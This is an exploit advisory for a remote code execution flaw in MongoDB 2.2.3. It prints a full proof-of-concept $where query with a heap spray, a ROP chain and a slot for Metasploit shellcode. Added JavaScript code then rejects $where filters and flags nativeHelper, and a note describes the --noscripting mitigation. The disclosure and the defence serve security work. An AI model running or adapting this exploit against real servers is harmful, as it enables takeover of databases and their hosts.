MongoDB nativeHelper.apply Remote Code Execution
Source: http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji- Author: agixid Published: 2013-04-12

#Title: MongoDB nativeHelper.apply Remote Code Execution
#Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
#Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz
#Version: 2.2.3

The following PoC exploits the "nativeHelper" feature in MongoDB's SpiderMonkey implementation.
The NativeFunction "func" comes from the "x" JavaScript object and is then called without any check:

db.my_collection.find({'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})
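
The PoC reaches nativeHelper through a `$where` clause, so an application that builds query filters from untrusted input can refuse any filter carrying `$where` before it reaches the driver. The guard below is an added example, not code from the original advisory or from MongoDB; the function names and the sample filters are assumptions constructed for illustration.

```javascript
// Added example: application-side guard against server-side JavaScript
// injection through $where. Names and sample data are hypothetical.

// Walk a query document and collect every $where clause with its path.
function findWhereClauses(node, path = '', out = []) {
  if (Array.isArray(node)) {
    node.forEach((item, i) => findWhereClauses(item, `${path}[${i}]`, out));
  } else if (node !== null && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      const here = path ? `${path}.${key}` : key;
      if (key === '$where') {
        // $where may arrive as a string or as a function object.
        const body = typeof value === 'function' ? value.toString() : String(value);
        // The nativeHelper flag is a triage hint only: string concatenation
        // can hide the name, which is why the policy below rejects all $where.
        out.push({ path: here, body, nativeHelper: /\bnativeHelper\b/.test(body) });
      } else {
        findWhereClauses(value, here, out);
      }
    }
  }
  return out;
}

// Policy: a filter built from untrusted input must not carry any $where.
function assertNoServerSideJs(query) {
  const hits = findWhereClauses(query);
  if (hits.length > 0) {
    const where = hits.map((h) => h.path).join(', ');
    const err = new Error(`$where not allowed in filter at: ${where}`);
    err.findings = hits; // keep details for logging and alerting
    throw err;
  }
  return query;
}

// Constructed sample filters (not taken from real traffic).
const benign = { name: 'alice', $or: [{ age: { $gt: 30 } }, { admin: false }] };
const nested = { $and: [{ a: 1 }, { $or: [{ $where: 'nativeHelper.apply({"x": 0}, [])' }] }] };
const plain = { $where: 'this.a == this.b' };
```

On the server side, mongod's `--noscripting` option disables server-side JavaScript entirely, which removes the `$where` entry point regardless of what the application forwards.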


 